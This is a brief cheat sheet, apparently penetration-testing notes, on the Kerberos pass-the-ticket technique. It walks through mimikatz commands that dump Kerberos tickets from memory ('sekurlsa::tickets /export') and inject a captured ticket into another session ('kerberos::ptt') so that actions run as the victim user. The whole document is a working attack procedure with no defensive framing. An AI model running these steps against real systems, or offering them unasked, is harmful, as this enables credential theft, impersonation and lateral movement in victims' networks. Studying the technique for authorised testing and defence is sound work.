# Pass the hash attack

## Pass the ticket

Generate a TGS ticket from authorized user session

* ./mimikatz.exe
* privilege::debug
* sekurlsa::tickets /export
* dir \*.kirbi

Select any ticket and copy its name and send to unauthorized user’s session

* kerberos::ptt \<ticket-name>
* klist to verify if session is generated or not
* now we can perform action on the behalf of another user whose ticket was captured